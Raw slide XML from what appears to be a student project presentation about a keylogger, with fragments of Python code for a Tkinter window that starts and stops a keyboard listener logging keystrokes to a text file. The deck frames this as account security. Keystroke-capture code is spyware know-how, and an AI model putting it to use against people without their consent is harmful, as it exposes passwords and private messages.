                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-296" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LU</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-66" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</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9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="198" name="object 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676440" y="6467400"/>
            <a:ext cx="2142720" cy="199800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="6473160"/>
            <a:ext cx="179856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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="25"/>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9A45ACE5-EACD-4361-81C8-A8666F157762}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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201" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2882880" y="1433160"/>
            <a:ext cx="9219960" cy="50274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Calibri"/>
              </a:rPr>
              <a:t>def start_keylogger():</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global listener</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listener = keyboard.Listener(on_press=on_press, on_release=on_release)</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listener.start()</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label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</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start_button.config(state='disabled')</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stop_button.config(state='normal')</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def stop_keylogger():</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global listener</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listener.stop()</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label.config(text="Keylogger stopped.")</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start_button.config(state='normal')</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stop_button.config(state='disabled')</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root = Tk()</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root.title("Keylogger")</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2" name="object 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1476360"/>
            <a:ext cx="2695320" cy="3247560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203"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04"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05"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06" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558000" y="857880"/>
            <a:ext cx="9762840" cy="1158480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="13320" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-41" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="4" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LU</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9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-347" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-7" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </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1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="58" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-296" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LU</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-66" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</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9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="207" name="object 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676440" y="6467400"/>
            <a:ext cx="2142720" cy="199800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="6473160"/>
            <a:ext cx="179856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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="26"/>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AB136B1B-15BC-403A-B538-35E628DF18E4}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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210" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819520" y="1329480"/>
            <a:ext cx="9219960" cy="36558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Calibri"/>
              </a:rPr>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</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label.config(anchor=CENTER)</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label.pack()</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start_button = Button(root, text="Start", command=start_keylogger)</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start_button.pack(side=LEFT)</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stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</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stop_button.pack(side=RIGHT)</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root.geometry("250x250")</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root.mainloop()</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object 2"/>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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212"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13"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14"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215" name="object 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="66600" y="3381480"/>
            <a:ext cx="2466720" cy="3419280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="654840"/>
            <a:ext cx="7542720" cy="1312200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="16560" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="18" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>WOW</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="83" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>IN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="-7" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>YOUR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="-12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4250" spc="18" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SOLUTION</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4250" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11277360" y="6473160"/>
            <a:ext cx="228240" cy="19692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01BCB4E0-F49B-4B40-99D1-47467D31630B}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d936b"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2533680" y="2133720"/>
            <a:ext cx="6609960" cy="173556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000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>To provide secureness to accounts in a system or computer by this own development of keyloggers.</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Keystrokes and mouse clicks are recursively  overwrites into a text file.</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Accessibility and readability is simpler.</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object 2"/>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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220"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21"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22"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223" name="object 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1666800" y="6467400"/>
            <a:ext cx="75960" cy="177480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="1368000"/>
            <a:ext cx="2811600" cy="560880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="12600" bIns="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="99"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-46" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Teams</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>cam</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-106" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-7" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-7" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>wireframes</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11277360" y="6473160"/>
            <a:ext cx="228240" cy="19692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11D71363-B49E-42D6-B8D4-EE518F7E0274}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d936b"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="291240"/>
            <a:ext cx="3303720" cy="1476000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="13320" bIns="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="12" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
